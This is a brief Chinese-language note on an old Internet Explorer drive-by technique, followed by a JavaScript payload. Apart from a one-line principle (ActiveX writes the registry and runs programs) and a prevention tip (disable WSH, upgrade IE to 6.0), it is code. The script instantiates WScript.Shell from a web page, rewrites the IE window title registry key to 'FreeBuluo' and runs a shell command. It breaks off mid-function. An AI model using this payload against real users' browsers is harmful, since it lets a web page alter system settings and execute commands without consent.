原理 利用ActiveX写注册表,运行程序
预防方法 禁用WSH 升级IE至6.0
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\
Main\\Window Title","FreeBuluo");
Shl.Run('command /c pause',false,1);
|